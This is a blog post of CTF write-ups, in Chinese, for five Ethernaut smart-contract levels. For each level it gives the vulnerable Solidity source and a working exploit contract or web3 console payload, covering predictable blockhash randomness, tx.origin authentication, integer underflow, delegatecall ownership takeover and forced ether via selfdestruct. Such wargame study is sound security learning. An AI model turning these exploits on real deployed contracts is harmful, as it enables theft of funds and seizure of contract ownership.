<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="区块链学习之壹ethernaut - Coin Flip投币咯，我最喜欢的； source 1234567891011121314151617181920212223242526272829303132&#x2F;&#x2F; SPDX-License-Identifier: MITpragma solidity ^0.8.0;contract CoinFlip &#123;    uint256 public co">
<meta property="og:type" content="article">
<meta property="og:title" content="区块链学习之壹">
<meta property="og:url" content="http://example.com/2024/08/30/2024-08-30-%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AD%A6%E4%B9%A0%E4%B9%8B%E5%A3%B9/index.html">
<meta property="og:site_name" content="QST&#39;s kawa BLOG">
<meta property="og:description" content="区块链学习之壹ethernaut - Coin Flip投币咯，我最喜欢的； source 1234567891011121314151617181920212223242526272829303132&#x2F;&#x2F; SPDX-License-Identifier: MITpragma solidity ^0.8.0;contract CoinFlip &#123;    uint256 public co">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.imgur.com/Wu8TWiZ.png">
<meta property="og:image" content="https://i.imgur.com/0eofV8w.png">
<meta property="og:image" content="https://i.imgur.com/y6K2gag.png">
<meta property="og:image" content="https://i.imgur.com/FQMcmy6.png">
<meta property="og:image" content="https://i.imgur.com/ZGnM4Hx.png">
<meta property="og:image" content="https://img.learnblockchain.cn/attachments/2022/02/XyJFUGH5620dcb1e08bda.jpg">
<meta property="article:published_time" content="2024-08-29T16:00:00.000Z">
<meta property="article:modified_time" content="2024-09-01T17:41:32.467Z">
<meta property="article:author" content="QST137">
<meta property="article:tag" content="菜鸟">
<meta property="article:tag" content="BlockChain">
<meta property="article:tag" content="WriteUp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.imgur.com/Wu8TWiZ.png">

<link rel="canonical" href="http://example.com/2024/08/30/2024-08-30-%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AD%A6%E4%B9%A0%E4%B9%8B%E5%A3%B9/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>区块链学习之壹 | QST's kawa BLOG</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">QST's kawa BLOG</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Cyber Security</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/08/30/2024-08-30-%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AD%A6%E4%B9%A0%E4%B9%8B%E5%A3%B9/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="QST137">
      <meta itemprop="description" content="三山岁岁有人去，唯恐海风生白波。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="QST's kawa BLOG">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          区块链学习之壹
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2024-08-30 00:00:00" itemprop="dateCreated datePublished" datetime="2024-08-30T00:00:00+08:00">2024-08-30</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2024-09-02 01:41:32" itemprop="dateModified" datetime="2024-09-02T01:41:32+08:00">2024-09-02</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/blockchain/" itemprop="url" rel="index"><span itemprop="name">blockchain</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="区块链学习之壹"><a href="#区块链学习之壹" class="headerlink" title="区块链学习之壹"></a>区块链学习之壹</h1><h2 id="ethernaut-Coin-Flip"><a href="#ethernaut-Coin-Flip" class="headerlink" title="ethernaut - Coin Flip"></a>ethernaut - Coin Flip</h2><p>投币咯，我最喜欢的；</p>
<p><strong>source</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">contract CoinFlip &#123;</span><br><span class="line">    uint256 public consecutiveWins;</span><br><span class="line">    uint256 lastHash;</span><br><span class="line">    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;</span><br><span class="line"></span><br><span class="line">    constructor() &#123;</span><br><span class="line">        consecutiveWins = 0;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function flip(bool _guess) public returns (bool) &#123;</span><br><span class="line">        uint256 blockValue = uint256(blockhash(block.number - 1));</span><br><span class="line"></span><br><span class="line">        if (lastHash == blockValue) &#123;</span><br><span class="line">            revert();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        lastHash = blockValue;</span><br><span class="line">        uint256 coinFlip = blockValue / FACTOR;</span><br><span class="line">        bool side = coinFlip == 1 ? true : false;</span><br><span class="line"></span><br><span class="line">        if (side == _guess) &#123;</span><br><span class="line">            consecutiveWins++;</span><br><span class="line">            return true;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            consecutiveWins = 0;</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h3><p> 随机的核心在于 <code>blockhash(block.number - 1)</code>；</p>
<p>攻击原理是，如果在攻击合约中调用目标合约，就可以让两次调用在一个 block ，从而两次伪随机的结果相同；</p>
<p>注意<code>lastHash == blockValue</code>是不允许的，这事实上限制了不能连续在同一 block 内调用<code>flip</code> ；</p>
<p>解决方案是运行十次 exp ，而不是在 exp 中调用十次<code>flip</code>；</p>
<p><strong>source of exp contract</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: GPL-3.0</span><br><span class="line"></span><br><span class="line">pragma solidity &gt;=0.8.2 &lt;0.9.0;</span><br><span class="line"></span><br><span class="line">/**</span><br><span class="line"> * @title Storage</span><br><span class="line"> * @dev Store &amp; retrieve value in a variable</span><br><span class="line"> * @custom:dev-run-script ./scripts/deploy_with_ethers.ts</span><br><span class="line"> */</span><br><span class="line"> </span><br><span class="line">// interface for instancing the problem contract</span><br><span class="line">interface CoinFlip &#123;</span><br><span class="line">    function flip(bool _guess) external returns (bool) ;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// accacking contract</span><br><span class="line">contract Storage &#123;</span><br><span class="line">    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;</span><br><span class="line">    address instance = 0xb9A0C84D1C4a44322a141b401b95a69dCE386dC4;</span><br><span class="line">    uint256 lastHash;</span><br><span class="line">    CoinFlip con;</span><br><span class="line">    </span><br><span class="line">    function exp() public&#123;</span><br><span class="line">        uint256 blockValue = uint256(blockhash(block.number - 1));</span><br><span class="line"></span><br><span class="line">        if (lastHash == blockValue) &#123;</span><br><span class="line">            revert();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        // calculate which side</span><br><span class="line">        lastHash = blockValue;</span><br><span class="line">        uint256 coinFlip = blockValue / FACTOR;</span><br><span class="line">        bool side = coinFlip == 1 ? true : false;</span><br><span class="line">        </span><br><span class="line">        // call con.flip </span><br><span class="line">        con = CoinFlip(instance);</span><br><span class="line">        con.flip(side);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>部署合约，调十次 <code>exp</code> 即可；</p>
<h3 id="使用-Remix-Injected-Provider-编写-attacking-contract"><a href="#使用-Remix-Injected-Provider-编写-attacking-contract" class="headerlink" title="使用 Remix - Injected Provider 编写 attacking contract"></a>使用 Remix - Injected Provider 编写 attacking contract</h3><p>一，写代码到<code>contracts/xxx.sol</code>，开启自动编译；</p>
<p><img src="https://i.imgur.com/Wu8TWiZ.png"></p>
<p><img src="https://i.imgur.com/0eofV8w.png"></p>
<p>二，选择环境 <code>Injected Provider</code>，选择要部署的合约；</p>
<p><img src="https://i.imgur.com/y6K2gag.png"></p>
<p>三，部署；</p>
<p><img src="https://i.imgur.com/FQMcmy6.png"></p>
<p>四，调用<code>exp</code>函数；</p>
<p><img src="https://i.imgur.com/ZGnM4Hx.png"></p>
<p>这样就完成了一个简单 attacking contract 的部署到调用；</p>
<h2 id="ethernaut-Telephone"><a href="#ethernaut-Telephone" class="headerlink" title="ethernaut - Telephone"></a>ethernaut - Telephone</h2><p><strong>source</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">contract Telephone &#123;</span><br><span class="line">    address public owner;</span><br><span class="line"></span><br><span class="line">    constructor() &#123;</span><br><span class="line">        owner = msg.sender;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function changeOwner(address _owner) public &#123;</span><br><span class="line">        if (tx.origin != msg.sender) &#123;</span><br><span class="line">            owner = _owner;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="difference-between-msg-sender-tx-origin"><a href="#difference-between-msg-sender-tx-origin" class="headerlink" title="difference between msg.sender&amp;tx.origin"></a>difference between msg.sender&amp;tx.origin</h3><p><img src="https://img.learnblockchain.cn/attachments/2022/02/XyJFUGH5620dcb1e08bda.jpg"></p>
<p>很直观了，<code>msg.sender</code>是功能的调用者，<code>tx.origin</code>调用功能的账户；</p>
<h3 id="题解-1"><a href="#题解-1" class="headerlink" title="题解"></a>题解</h3><p>只需要用一个非<code>player</code>的合约调用<code>instance</code>即可；</p>
<p><strong>exp source</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: GPL-3.0</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">interface Telephone &#123;</span><br><span class="line">    function changeOwner(address _owner) external ;</span><br><span class="line">&#125;</span><br><span class="line">contract Attack &#123;</span><br><span class="line">    function exp() public &#123;</span><br><span class="line">        Telephone t = Telephone(0x7433a6f73fA68a0ED229e4164F4D6503ffF0a489);</span><br><span class="line">        t.changeOwner(tx.origin);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="ethernaut-Telephone-1"><a href="#ethernaut-Telephone-1" class="headerlink" title="ethernaut - Telephone"></a>ethernaut - Telephone</h2><p><strong>description</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">//The goal of this level is for you to hack the basic token contract below.</span><br><span class="line"></span><br><span class="line">//You are given 20 tokens to start with and you will beat the level if you somehow manage to get your hands on any additional tokens. Preferably a very large amount of tokens.</span><br><span class="line"></span><br><span class="line">//  Things that might help:</span><br><span class="line"></span><br><span class="line">//What is an odometer?</span><br></pre></td></tr></table></figure>

<p>要求把自己余额弄成一个很大的数；</p>
<p><strong>source</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Token &#123;</span><br><span class="line">    mapping(address =&gt; uint256) balances;</span><br><span class="line">    uint256 public totalSupply;</span><br><span class="line"></span><br><span class="line">    constructor(uint256 _initialSupply) public &#123;</span><br><span class="line">        balances[msg.sender] = totalSupply = _initialSupply;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function transfer(address _to, uint256 _value) public returns (bool) &#123;</span><br><span class="line">        require(balances[msg.sender] - _value &gt;= 0);</span><br><span class="line">        balances[msg.sender] -= _value;</span><br><span class="line">        balances[_to] += _value;</span><br><span class="line">        return true;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function balanceOf(address _owner) public view returns (uint256 balance) &#123;</span><br><span class="line">        return balances[_owner];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="What-is-an-odometer"><a href="#What-is-an-odometer" class="headerlink" title="What is an odometer?"></a>What is an odometer?</h3><p>说实话没懂这个hint；</p>
<h3 id="uint-overflow"><a href="#uint-overflow" class="headerlink" title="uint overflow"></a>uint overflow</h3><p><code>transfer</code> 表面上限制了余额不能为负数：<code>require(balances[msg.sender] - _value &gt;= 0)</code>；</p>
<p>但是<code>balances</code>的键值实际上是<code>uint256</code>，查阅 <a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/types.html#id8">solidity 官方文档</a> 得知两点：</p>
<ol>
<li>“Solidity中的整数是有取值范围的。 例如 <code>uint32</code> 类型的取值范围是 <code>0</code> 到 <code>2 ** 32-1</code> 。 0.8.0 开始，算术运算有两个计算模式：一个是 “wrapping”（截断）模式或称 “unchecked”（不检查）模式，一个是”checked” （检查）模式。 默认情况下，算术运算在 “checked” 模式下，即都会进行溢出检查，如果结果落在取值范围之外，调用会通过 <a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/control-structures.html#assert-and-require">失败异常</a> 回退。 你也可以通过 <code>unchecked &#123; ... &#125;</code> 切换到 “unchecked”模式，更多可参考 <a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/control-structures.html#unchecked">unchecked</a> .”</li>
<li>在 0.8.0 以前的版本（这里是 0.7.5）有这样的描述：“加法，减法和乘法具有通常的语义，值用两进制补码表示，意思是比如：<code>uint256（0） - uint256（1）== 2 ** 256 - 1</code> 。 我们在设计和编写智能合约时必须考虑到溢出问题。”</li>
</ol>
<p>题目环境为 <code>0.6.0</code> ，溢出问题存在，要搞大数字直接溢出即可；</p>
<h3 id="题解-2"><a href="#题解-2" class="headerlink" title="题解"></a>题解</h3><p><strong>payload</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">await</span> contract.<span class="title function_">transfer</span>(instance,<span class="number">21</span>)</span><br></pre></td></tr></table></figure>

<h2 id="ethernaut-Delegation"><a href="#ethernaut-Delegation" class="headerlink" title="ethernaut - Delegation"></a>ethernaut - Delegation</h2><p><strong>description</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">// The goal of this level is for you to claim ownership of the instance you are given.</span><br><span class="line"></span><br><span class="line">  // Things that might help</span><br><span class="line"></span><br><span class="line">// Look into Solidity&#x27;s documentation on the delegatecall low level function, how it works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.</span><br><span class="line">// Fallback methods</span><br><span class="line">// Method ids</span><br></pre></td></tr></table></figure>

<p><strong>source</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">contract Delegate &#123;</span><br><span class="line">    address public owner;</span><br><span class="line"></span><br><span class="line">    constructor(address _owner) &#123;</span><br><span class="line">        owner = _owner;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function pwn() public &#123;</span><br><span class="line">        owner = msg.sender;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract Delegation &#123;</span><br><span class="line">    address public owner;</span><br><span class="line">    Delegate delegate;</span><br><span class="line"></span><br><span class="line">    constructor(address _delegateAddress) &#123;</span><br><span class="line">        delegate = Delegate(_delegateAddress);</span><br><span class="line">        owner = msg.sender;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    fallback() external &#123;</span><br><span class="line">        (bool result,) = address(delegate).delegatecall(msg.data);</span><br><span class="line">        if (result) &#123;</span><br><span class="line">            this;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>部署的是<code>Delegation</code>，其回调函数的作用是进行一次<code>delegatecall</code>， 在<code>Delegate</code>中调用目标函数；</p>
<p>直接尝试调用<code>pwn()</code>即可；</p>
<p>而且这里涉及到<code>delegatecall</code>的特点，不改变交易属性，也就是<code>msg.sender</code>仍然是<code>player</code>自己；</p>
<p>发起一个交易，将签名<code>data</code>改为<code>pwn()</code>的<code>keccak256</code>值的前四字节；</p>
<p>傻逼 js <code>slice</code>的时候把<code>sha3</code>的结果看作字符串，因此取前四字节要取前十位，因为有<code>&quot;0x&quot;</code>；</p>
<h3 id="题解-3"><a href="#题解-3" class="headerlink" title="题解"></a>题解</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">await</span> contract.<span class="title function_">sendTransaction</span>(&#123;<span class="attr">data</span>:web3.<span class="property">utils</span>.<span class="title function_">sha3</span>(<span class="string">&quot;pwn()&quot;</span>).<span class="title function_">slice</span>(<span class="number">0</span>,<span class="number">10</span>)&#125;);</span><br></pre></td></tr></table></figure>

<p>注：solidity 的<code>keccak256</code>就是<code>sha3</code>；</p>
<h2 id="ethernaut-Force"><a href="#ethernaut-Force" class="headerlink" title="ethernaut - Force"></a>ethernaut - Force</h2><p><strong>description</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">// Some contracts will simply not take your money ¯\_(ツ)_/¯</span><br><span class="line"></span><br><span class="line">// The goal of this level is to make the balance of the contract greater than zero.</span><br><span class="line"></span><br><span class="line">  // Things that might help:</span><br><span class="line"></span><br><span class="line">// Fallback methods</span><br><span class="line">// Sometimes the best way to attack a contract is with another contract.</span><br><span class="line">// See the &quot;?&quot; page above, section &quot;Beyond the console&quot;</span><br></pre></td></tr></table></figure>

<p><strong>source</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">contract Force &#123; /*</span><br><span class="line">                   MEOW ?</span><br><span class="line">         /\_/\   /</span><br><span class="line">    ____/ o o \</span><br><span class="line">    /~____  =ø= /</span><br><span class="line">    (______)__m_m)</span><br><span class="line">                   */ &#125;</span><br></pre></td></tr></table></figure>

<p>给空合约发钱的问题，没有<code>receive()</code>也没有<code>callback()</code>；</p>
<p>查阅官方文档：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">// 一个没有receive函数的合约，可以作为 coinbase 交易 （又名 矿工区块回报 ）的接收者或者作为 selfdestruct 的目标来接收以太币。</span><br></pre></td></tr></table></figure>

<p>结合提示，尝试构建一个有<code>receive()</code>和<code>selfdestruct()</code>的合约，然后销毁之。</p>
<h3 id="题解-4"><a href="#题解-4" class="headerlink" title="题解"></a>题解</h3><p><strong>exp source (GPT)</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">contract Attack &#123;</span><br><span class="line">    address payable target;</span><br><span class="line"></span><br><span class="line">    // 在部署时设置目标合约的地址</span><br><span class="line">    constructor(address payable _target) &#123;</span><br><span class="line">        target = _target;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 允许该合约接收以太币</span><br><span class="line">    receive() external payable &#123;&#125;</span><br><span class="line"></span><br><span class="line">    // 自毁合约并发送所有以太币到目标合约</span><br><span class="line">    function destroy() external payable &#123;</span><br><span class="line">        selfdestruct(target);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>部署之后向目标合约转账；</p>
<p>然后调用<code>destroy()</code>，<code>getBalance()</code>后发现<code>instant</code>已经有余额；</p>
<p>通！</p>
<h2 id="你好"><a href="#你好" class="headerlink" title="你好"></a>你好</h2><p>好你；</p>
<p>想起来小学有个大胖子，别人招惹他之后，他的口头禅是：</p>
<p>”好你个……“</p>
<p>小秦加油努力！</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E8%8F%9C%E9%B8%9F/" rel="tag"># 菜鸟</a>
              <a href="/tags/BlockChain/" rel="tag"># BlockChain</a>
              <a href="/tags/WriteUp/" rel="tag"># WriteUp</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/04/02/2024-04-02-%E6%97%A2%E5%AE%9A%E7%9A%84%E6%9C%AA%E6%9D%A5/" rel="prev" title="既定的未来">
      <i class="fa fa-chevron-left"></i> 既定的未来
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/09/02/2024-09-02-webshell%20%E6%8A%93%E5%8C%85/" rel="next" title="webshell 抓包">
      webshell 抓包 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
